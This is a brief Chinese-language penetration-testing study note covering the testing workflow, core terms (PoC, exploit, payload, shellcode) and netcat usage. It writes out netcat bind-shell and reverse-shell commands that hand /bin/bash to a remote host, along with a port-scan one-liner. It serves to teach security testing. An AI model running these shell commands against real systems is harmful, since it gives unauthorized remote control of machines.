渗透测试
渗透测试流程
- 信息收集
- a. 基本信息收集: IP、网段、域名、端口
- b.操作系统
- d.中间件
- e.脚本
- f.数据库
- g.CMS 源码
- h.社工信息:联系信息、人员信息、公司信息、域名/服务器注册商
- 漏洞探测
- a.借用漏洞库 比如:www.exploit-db.com
- b.根据不同的漏洞自己挖掘 智榜样a. 弱口命
- b. REC(远程命令执行漏洞和远程代码执行漏洞)
- c. SQL 注入
- d. XSS 跨站脚本攻击
- e. CSRF(跨站请求伪造)
- f. SSRF(服务的请求伪造)
- g. 文件上传、下载
- h. XXE(XML 外部实体注入)
- 漏洞利用
- 手工验证
- 获取所需信息
- 绕过防御机制(WAF,防火墙)
- 定制攻击路径(内网,间接、直接)
- 绕过检测机制(代码检查)
- 攻击代码
- 信息整理和报告撰写
渗透测试核心概念
- 漏洞 PoC
复现漏洞demo
- EXP
exploit 漏洞攻击
- Payload
成功执行的代码
- Shellcode
cmd 或者 /bin/bash,正向shell和反向shell
- 社工
其它概念
- 肉鸡
被控制的计算机
- 木马
用于控制的后门
- 病毒
破坏和复制
- 0day
- 1day
- nday
瑞士军刀 (NetCut)使用
- 参数
-l :开启监听
-p:指定端口
-t:以 telnet 形式应答
-e:程序重定向
-n:以数字形式标识 IP
-v:显示执行命令过程
-z:不进行交互,直接显示结果
-u:使用 UDP 协议传输
-w:设置超时时间
-d 后台运行
- 简单交互
#服务端监听
nc -lp 5566
#客户端
nc <target ip> 5566
- 正向shell
服务端
$ nc -lp 5566 -e /bin/bash
客户端
c: nc 192.168.239.128 5566
- 反向shell
服务端
$ nc -lvp 5566
客户端
c: nc -e /bin/bash 192.168.239.128 5566
- 端口扫描
nc -n -v -w1 -z 192.168.239.128 1-1000
- 打印banner
echo " " | nc -n -v -w1 -z 192.168.239.128 1-1000
练习地址
墨者学院 www.mozhe.cn/